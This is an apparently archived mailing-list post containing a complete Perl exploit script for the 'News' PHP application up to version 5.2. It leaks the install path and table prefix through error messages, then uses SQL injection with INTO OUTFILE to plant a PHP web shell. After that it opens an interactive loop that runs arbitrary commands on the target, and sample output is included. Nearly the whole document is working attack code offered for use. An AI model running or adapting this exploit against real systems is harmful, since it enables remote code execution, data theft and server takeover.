<<< Date Index >>>     <<< Thread Index >>>

News <= 5.2 XSS, SQL Injection, Full Path Disclosure



#!/usr/bin/perl
#
#   VulnScr: News version 5.2 and prior
#    E-mail: contact@xxxxxxxxxxxxxxxxxxxx
#       Web: www.vincent-leclercq.com
#
#      Date: Thu June 29 12:01 2006
#   Credits: DarkFig (gmdarkfig@xxxxxxxxx)
#      Vuln: XSS, Full Path Disclosure, SQL Injection
# Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =))
#   Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 
during the installation of the script)
#
#
#  +-----------------------------------------+
#  | News <= 5.2 SQL Injection (cmd exec) ---|
#  +-----------------------------------------+
#  [+]Full path: OK [/home/www/victim/news52]
#  [+]Prefix: OK [news_]
#  [+]File exist: OK
#  [localhost]uname -a
#  Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 
GNU/Linux
#  [localhost]exit
#  +-----------------------------------------+
#
use LWP::UserAgent;
use LWP::Simple;
use Getopt::Long;


#
# Argvs
#
header();
if(!$ARGV[1]){ &usageis; }
GetOptions( 'host=s'  => \$host,
            'path=s'  => \$path,
           );
if($host =~ /http:\/\/(.*)/){
  $host = $1;
}


#
# Vars
#
my $helurl = 'http://'.$host.$path;
my $uagent = 'Perlnamigator';
my $timeut = '30';
my $errr00 = "[-]Can't connect to the host\n";
my $errr01 = "[-]Can't get the full path of the website\n";
my $errr02 = "[-]Can't get the table prefix\n";
my $errr03 = "[-]The php file doesn't exist\n";


#
# Client
#
my $client = LWP::UserAgent->new();
$client->agent($uagent);
$client->timeout($timeut);


#
# First step: Determine the installation path.
#
$req1 = $client->post($helurl.'index.php', Content => ['mail[]' => 
'root\@localhost.com', 'submit' => 'S%27inscrire'],) or print $errr00 and 
the_end();
if($req1->as_string =~ /in <b>(.*?)\/configuration\/head.php<\/b>/) {
  $fullpath = $1;
  print "[+]Full path: OK [$fullpath]\n";
  $fullpath .= "/admin/smileys/hello.php";
} else {
  print $errr01;
  the_end();
}


#
# Second step: Determine the table prefix.
#
$req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR');
if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) {
  $prefixe = $1;
  print "[+]Prefix: OK [$prefixe]\n";
} else {
  print $errr02;
  the_end();
}


#
# Third step: Create a php file (system($cmd))
#
$inject = 
"%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23";
$req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print 
$errr00 and the_end();


#
# Fourth step: file_exists()? yes ! enjoy =)
#
$req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end();
print "[+]File exist: OK\n";
&commandexec;


#
# Subroutines
#
sub commandexec {
while(1 ne 2) {
  print "[$host]"; chomp($cmd = <STDIN>);
  if($cmd eq "exit"){ &the_end; }
  $req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and 
the_end();
  print $req5, "\n";
}}

sub usageis {
  print "| Usage: -host localhost -path /news/  ---| \n";
  &the_end;
}

sub the_end {
  print "+-----------------------------------------+\n";
  exit;
}

sub header {
  print "\n+-----------------------------------------+\n";
  print "| News <= 5.2 SQL Injection (cmd exec) ---|\n";
  print "+-----------------------------------------+\n";
}